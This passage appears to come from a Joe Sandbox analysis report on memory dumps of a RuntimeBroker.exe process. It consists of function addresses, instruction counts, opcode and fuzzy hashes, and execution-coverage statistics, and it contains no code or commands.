Instruction ID: 0fc510658a165182c2af8e48a0b0f12d6a98fc6329905e54848c6bed990c148f
Opcode Fuzzy Hash: cf7f85e9d82cce3c5e2a9a12e0150efd50b964ed16c121940b8285242d3aa73d
Instruction Fuzzy Hash: 4D11E86184E7C24FD747A7744825194BFB0AF03254B4E41FBC0858B0E3EA6D184AC722

Function 00007FF848E62398 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e60000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6192d0e322f33a403db2c70ef428f593e53144aa812bac4f8cbdd5a8c6a5422f
Instruction ID: afbc7a69b0d2785ef797af8c282d4b683e7b8fa5c257d91a44facdd1952927ab
Opcode Fuzzy Hash: 6192d0e322f33a403db2c70ef428f593e53144aa812bac4f8cbdd5a8c6a5422f
Instruction Fuzzy Hash: 7411FA3094891ACFDB68EB08C894BA973E1FB68311F0401B9C40EE7691DB35AD80DF85

Function 00007FF848E60C40 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e60000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b2e3b7ec81ad27648dd1297d8726867d428adf5c2345ab7514c8d668a9f13af
Instruction ID: 62eed9485e9813d401ae7f9eeec9734b840154183bb1d33ebe6db783b8a1e53e
Opcode Fuzzy Hash: 2b2e3b7ec81ad27648dd1297d8726867d428adf5c2345ab7514c8d668a9f13af
Instruction Fuzzy Hash: 15018C3590D6999FE702FB28C8442DDBFB0EF42360F5545B6C044EB292DA386A898B84

Function 00007FF848E6476B Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e60000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 564811df3341a67cedba09dbffc5440e4de5f582db33a59a0930a5cecb0b3b55
Instruction ID: 1189e2bda51583aac6c466c94dad6d19439c7eafe551c0d37d4086c159965ddc
Opcode Fuzzy Hash: 564811df3341a67cedba09dbffc5440e4de5f582db33a59a0930a5cecb0b3b55
Instruction Fuzzy Hash: 8E011D3090C41E8EEB64FA44D8517F872A1FB54365F5040BAD81EF3192EF3879D58A09

Function 00007FF848E9AAE9 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7775fa7487989348290a9e84e51c3cd62129ee17566cec70aeaae692c9b0ff80
Instruction ID: 2bb84aecc042872454e0069968f7a63ee94c0feb219be6096da18a075d23d210
Opcode Fuzzy Hash: 7775fa7487989348290a9e84e51c3cd62129ee17566cec70aeaae692c9b0ff80
Instruction Fuzzy Hash: CFF02731B0CBC44FC31A563958690607FE1DF5750134902EFC086C72A3D954AC858301

Function 00007FF848E60C50 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e60000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e89e45e757d0538b9e22a3a296b692ec20fb8e040182c046c51f5add90598aee
Instruction ID: b2b8875c47ca063fac3825a2a1ea0182adbecd3caf3257abdc8497e043532d6c
Opcode Fuzzy Hash: e89e45e757d0538b9e22a3a296b692ec20fb8e040182c046c51f5add90598aee
Instruction Fuzzy Hash: 67014B7090D7899FE702EB6488846DDBFF0EF02314F5441E6D444EB292DA386A488745

Function 00007FF848E647F2 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e60000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e802f2d097568cec3fa52b364d907dd46164ece8d02af576cb16dd2647e00adc
Instruction ID: 135c536dd038cbb2ad82e04fc3629bc8d2b21beb8eec37928fb60e16fcf516a6
Opcode Fuzzy Hash: e802f2d097568cec3fa52b364d907dd46164ece8d02af576cb16dd2647e00adc
Instruction Fuzzy Hash: E6F0543090C41A8EEA64F604D4556B87391FF553A4F9041B6DC4DF31A2FF387D954649

Function 00007FF848E60B77 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e60000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 849ce57074af94ef2dfc2bd30472d2e0e6621d792c6fec3cd77b958c2a59e3f2
Instruction ID: c12b1b538196bb15c1c96a5b55d8ae4b42bef9ab84d9841ff58b916f105e1972
Opcode Fuzzy Hash: 849ce57074af94ef2dfc2bd30472d2e0e6621d792c6fec3cd77b958c2a59e3f2
Instruction Fuzzy Hash: 8BF08C3925DA85CFD742EA3D88A58D4BF60EB02104BDA01FAD089CB5A2D3255C5EC741

Function 00007FF848E979E9 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb0eb12f3d5320669c4dce23b289a0b8f52a467f12c3d56129468021eeb996a6
Instruction ID: e43b296158b5f2c117e9848df6d0357b7c864a77961d8df2c1b958b5a3b9580f
Opcode Fuzzy Hash: eb0eb12f3d5320669c4dce23b289a0b8f52a467f12c3d56129468021eeb996a6
Instruction Fuzzy Hash: 38E01A3184E7C08FC70BAB3488688503F60EF6B61174A41EBC045CF6B3EA298C89C712

Function 00007FF848E756A8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e70000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7c478d697799a5a7f24270fd86399c56b43d0334bb21ad7333c0f9bc131bbc2
Instruction ID: 5a792aef1ecdeb39e7fcc84582557c3ca46575fc9d933f4d6e0950c573b494a2
Opcode Fuzzy Hash: f7c478d697799a5a7f24270fd86399c56b43d0334bb21ad7333c0f9bc131bbc2
Instruction Fuzzy Hash: 0FD05E30B6090D4B8B4CB62D8458434B3D1F7AA6067D452B8D40BC3281ED25ECC68B84

Function 00007FF848E9DAB9 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5e31e0dd69cafb3a558c08ee5d5c695e8c956fa90f511e9d8772894fb28f396
Instruction ID: c12cda3210c5ec0294eb800c66f604d1f23f697f28beb84c76c96f0b78efcd0a
Opcode Fuzzy Hash: b5e31e0dd69cafb3a558c08ee5d5c695e8c956fa90f511e9d8772894fb28f396
Instruction Fuzzy Hash: F0E04F3165A7804FC30A562888698543FB19F67111B4A40DAD045CB6B3D61ADC58C701

Function 00007FF848E9A5C0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FF848E9A650 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FF848E9DA39 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ead6c46c79be9d4b9b5a649b5c5f659c032068f69360fca393e239a87a21d3e
Instruction ID: 9ad43d370b82ece1a5fc5fd2cbc2222edd8c2311b1a71c1b7e6230c865fda84c
Opcode Fuzzy Hash: 2ead6c46c79be9d4b9b5a649b5c5f659c032068f69360fca393e239a87a21d3e
Instruction Fuzzy Hash: 8DE04F3164A7808FC30A962888698543BB1AF67112B4A40DAC045CF5B3D619DC98C701

Function 00007FF848E65035 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e60000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43b87db904ccdea304c1ca1f7b70ba481daea34ef60f95de779bfb05517315ce
Instruction ID: 7c5ec15222349d61f3e17f28a74a6160dd8ba60e9cb9b202d977dbb37d3a6829
Opcode Fuzzy Hash: 43b87db904ccdea304c1ca1f7b70ba481daea34ef60f95de779bfb05517315ce
Instruction Fuzzy Hash: 44E01A20E0C12A8EF7A4FA14C8553BD62A1FF85390F9440B4D81EB32E2CE387D85870A

Function 00007FF848E63FE3 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e60000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20abfbeaa48dfb07130820bc2bd8d4abb79acdd4fdd384df908c0f2d9738724
Instruction ID: dd4c708db4cafbb2691e64967004417898531e4f6514bef381a85ea06fde7a86
Opcode Fuzzy Hash: b20abfbeaa48dfb07130820bc2bd8d4abb79acdd4fdd384df908c0f2d9738724
Instruction Fuzzy Hash: 33E01211E2C5951EF29DB53C44263B454C1BF84751F884079D40EE32C3DE6D3C440296

Function 00007FF848E7400E Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e70000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65cbafbcce7d83ef3e7855392378b08e2135aad39972975ae00c1eaacc3e9f08
Instruction ID: d2c698f7ac36ad44c7af0c9fa770bf904b51d54248cb16a0f6070d6cd85ebb07
Opcode Fuzzy Hash: 65cbafbcce7d83ef3e7855392378b08e2135aad39972975ae00c1eaacc3e9f08
Instruction Fuzzy Hash: D7E0EC71D0880E9FE794EA58D4456BD7BB1FF44690F18027AC40A92296EF3928824B85

Function 00007FF848E9CD29 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12d241f0b4a4f59f2ce217d91ee4369bb6390042fd13e0558b8a908cae007e24
Instruction ID: 2033b699c478842931c7907934a17f4f1a7852e61ca7ac9cd5457f93f9261854
Opcode Fuzzy Hash: 12d241f0b4a4f59f2ce217d91ee4369bb6390042fd13e0558b8a908cae007e24
Instruction Fuzzy Hash: FAE0EC3150E7844FC30A9B6488699547FB0AF27211B8B01DBC045CF5B3D6599C98C752

Function 00007FF848E91B18 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9ad2d91dc8e0dd60b03e174c460b7f8d44bd72aad3cf06f5fa4f9187d5706a9
Instruction ID: 6860e281e8839fab31da90f4449eb0b4a3674e0bd024216dd2a64a62591d3962
Opcode Fuzzy Hash: b9ad2d91dc8e0dd60b03e174c460b7f8d44bd72aad3cf06f5fa4f9187d5706a9
Instruction Fuzzy Hash: EDD0C930A659084F8B4CB62C885996472D1EB69216B9540A9D00AC72A2EA6AE889C741

Function 00007FF848E99019 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5551bd2dbbaef9b6769fc7ecafded9a40e3cd93d8617f48703fa2c768f5bb3c
Instruction ID: 06c679eb6f8343883c3e99a1520e0bcf3aeb27e66553f20351b31dd088659928
Opcode Fuzzy Hash: b5551bd2dbbaef9b6769fc7ecafded9a40e3cd93d8617f48703fa2c768f5bb3c
Instruction Fuzzy Hash: 6BE0EC3151A7848FC34A9B2488699547FB0AF27211B8B41DAC449CB5B3D61D9C98CB42

Function 00007FF848E73A00 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e70000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FF848E91A60 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FF848E96F90 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab106bac20a1d0d558619b546c096607ebf4bc0132dd2453390b54ac1aa9af0b
Instruction ID: f6565522cf16812f5d7976c025dbd06a8b262392ace7800bc7fbdbfd7995864a
Opcode Fuzzy Hash: ab106bac20a1d0d558619b546c096607ebf4bc0132dd2453390b54ac1aa9af0b
Instruction Fuzzy Hash: C3D01234B549044FC70CBA388C598747391EB6A216B9544A9D00BC72B1DAAADD89C741

Function 00007FF848E9B890 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc3e7cbaab6c9951d57dcd1a87f18a55a0f1c18b8dcb396ec4019cbe5d343ac5
Instruction ID: 3077eb1bb96fb5cb631231b0731c328013f4e9d9d82fbd414bb285b14dd0a724
Opcode Fuzzy Hash: cc3e7cbaab6c9951d57dcd1a87f18a55a0f1c18b8dcb396ec4019cbe5d343ac5
Instruction Fuzzy Hash: 9FD01234B549044FC70CB63888598787391EB6A216B9550A9D00BC72B1DAAADC99C785

Function 00007FF848E7457F Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e70000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4b0104fbead0baf0710752d857b1eb15cf7d95b308d4dbc7bd2e6b15b31362d
Instruction ID: 416fc20bd3a4c7fcfcac8cea2cd8b82e8bcb9598285ab11dbf989d6323e5981e
Opcode Fuzzy Hash: d4b0104fbead0baf0710752d857b1eb15cf7d95b308d4dbc7bd2e6b15b31362d
Instruction Fuzzy Hash: 5FD01760D0C5068EE659BA4884406B82361FF44388F640035D81E932C2CF38A812C60A

Function 00007FF848E606AD Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e60000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac7b0ac8a8977b2166bdcafdea76f4d557da43147bc43dd4b69a1236d479024c
Instruction ID: 2d170cd6ac3ddbd40df591abbaaa3398485336ff1f6de3de9094e0f15cb8ab50
Opcode Fuzzy Hash: ac7b0ac8a8977b2166bdcafdea76f4d557da43147bc43dd4b69a1236d479024c
Instruction Fuzzy Hash: 69C08C00E5F53F08E445712E14020ACA2007FC42A0FD00032C01C700929EAD30C5024E

Function 00007FF848E61310 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e60000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1800fbf8d0802c0db32221d879b3273cf0156490a78abdb803dccd60cdd09fce
Instruction ID: 4c4c54f3c8cde94948c7a2f49b0cb6aad3158be49989b9562e90b4b595afe2f7
Opcode Fuzzy Hash: 1800fbf8d0802c0db32221d879b3273cf0156490a78abdb803dccd60cdd09fce
Instruction Fuzzy Hash: EEC04C349558098FC948FB29CC8991477A0FF99215BD51090E409C7171E669ECD5D745

Function 00007FF848E606D0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e60000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3d1b863e05a36076fb3914a81ee039196d249017470fdedf4c6784e9210262a
Instruction ID: 76001be2627f62b7e0961547e6f0a2bd22b71584716b6d6c6d474acfe090cbdb
Opcode Fuzzy Hash: f3d1b863e05a36076fb3914a81ee039196d249017470fdedf4c6784e9210262a
Instruction Fuzzy Hash: 1BB01200CAE41F04E408317A08420A470407FC4140FC00070D40C7008299DD3094034A

Analysis Process: RuntimeBroker.exePID: 6972, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	4.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	5
Total number of Limit Nodes:	1

Executed Functions

Function 00007FF848E80872 Relevance: 2.0, APIs: 1, Instructions: 525
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000002E.00000002.2528454789.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff848e80000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3895e6c6571c4bae0798d8fe330c58cde7eba575b3af6e49f0aa7260b9b4134f
Instruction ID: 59f2da67a66cca41596ac9f4ec682cbd0aaeba644121d5abadb154b1ec746d01
Opcode Fuzzy Hash: 3895e6c6571c4bae0798d8fe330c58cde7eba575b3af6e49f0aa7260b9b4134f
Instruction Fuzzy Hash: C8F1C53050CA8D8FDB59EF28D8467E97BE1FF55350F04426EE84EC3292DB74A8458B92

Function 00007FF848E907B6 Relevance: 1.6, Instructions: 1607
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000002E.00000002.2528454789.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a408f4b6c394294a33b767dda918c0b3235f8b7bb6f058fc4864e12dc53b4e8
Instruction ID: 85a8a43d4a4fe636f6d692054cc9a35179dc4daf68fd7456c1a9a895c28cd2b8
Opcode Fuzzy Hash: 8a408f4b6c394294a33b767dda918c0b3235f8b7bb6f058fc4864e12dc53b4e8
Instruction Fuzzy Hash: 79B28131E1C95A9FEB98FB6884516B873A2FF94384F5445B9D00EC32C6DE78BC818785

Function 00007FF848E913EA Relevance: 1.0, Instructions: 1025COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.2528454789.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59b52365fe64fc1999a1544dfffd2cec905f437005236390e17149d2bd0aacb3
Instruction ID: 4d1e96c01ca629a29d93cda43cc28a9677aa4eb984fe501a7614dcc25aa8a4bf
Opcode Fuzzy Hash: 59b52365fe64fc1999a1544dfffd2cec905f437005236390e17149d2bd0aacb3
Instruction Fuzzy Hash: 16729231E1C95A9FEB99FB6884516B873A1FF55380F5445B9C00EC32C7DF39A8828B85

Function 00007FF848EB0D31 Relevance: .5, Instructions: 490
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000002E.00000002.2528454789.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff848eb0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54dfa8b6633413784f8617e37c2f0d490e0f63a391cc8586abc82053ca941ca3
Instruction ID: 6071f33e58f99dcfa74f5e2d576c666ec5811c24695103c72d0232b09baf5876
Opcode Fuzzy Hash: 54dfa8b6633413784f8617e37c2f0d490e0f63a391cc8586abc82053ca941ca3
Instruction Fuzzy Hash: E3C19B3596C75A0FE31DA9184C820B47381FBA2715F28577CCDDB8319BEE39A81786C9

Function 00007FF848EB0D65 Relevance: .4, Instructions: 358
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000002E.00000002.2528454789.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff848eb0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ddf7cffa1a8af9ae55537edf6247ef95560602525b5b9067fbff74256f849cc
Instruction ID: 3521fd9ffbd902a11d25e03ade1a7895017b7dbe81d6c9eb33bc2577cbafabbc
Opcode Fuzzy Hash: 9ddf7cffa1a8af9ae55537edf6247ef95560602525b5b9067fbff74256f849cc
Instruction Fuzzy Hash: 5E916872D5D75E0FE32CA8284C420757784FB52615F29637DCEEB83197EA29B81341C9

Function 00007FF848EBA5A9 Relevance: 1.3, Strings: 1, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FF848EBA5C6

Memory Dump Source

Source File: 0000002E.00000002.2528454789.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff848eb0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 70234b21227b96b9c3125d46742fd869124fd0be33f82aad8cd7608900c45cef
Instruction ID: c4d69c1dd4a11a22b6e605c827084f2af19097f215ade8a94267c3cca10074cc
Opcode Fuzzy Hash: 70234b21227b96b9c3125d46742fd869124fd0be33f82aad8cd7608900c45cef
Instruction Fuzzy Hash: 76F06D71A0E7C44FCB1AEA3488694547FA1EF7720274A52EFC046CF1A3EA2DC889C711

Function 00007FF848EBA639 Relevance: 1.3, Strings: 1, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FF848EBA656

Memory Dump Source

Source File: 0000002E.00000002.2528454789.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff848eb0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 77768eb1bd8fd95025f7a23abba1b2cc758dd82331647650115c0bc654bc34e5
Instruction ID: 84a17287a1b9a5ab5f2cc364a465f3eebaacf71d7305f80cd00ebadd68335a8d
Opcode Fuzzy Hash: 77768eb1bd8fd95025f7a23abba1b2cc758dd82331647650115c0bc654bc34e5
Instruction Fuzzy Hash: AEE06D71A0E7844FCB1AEA34886D4547FA0EF7720174A42EFC046CB1A7EE2D8889CB01

Function 00007FF848EB6B39 Relevance: 1.3, Strings: 1, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FF848EB6B56

Memory Dump Source

Source File: 0000002E.00000002.2528454789.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

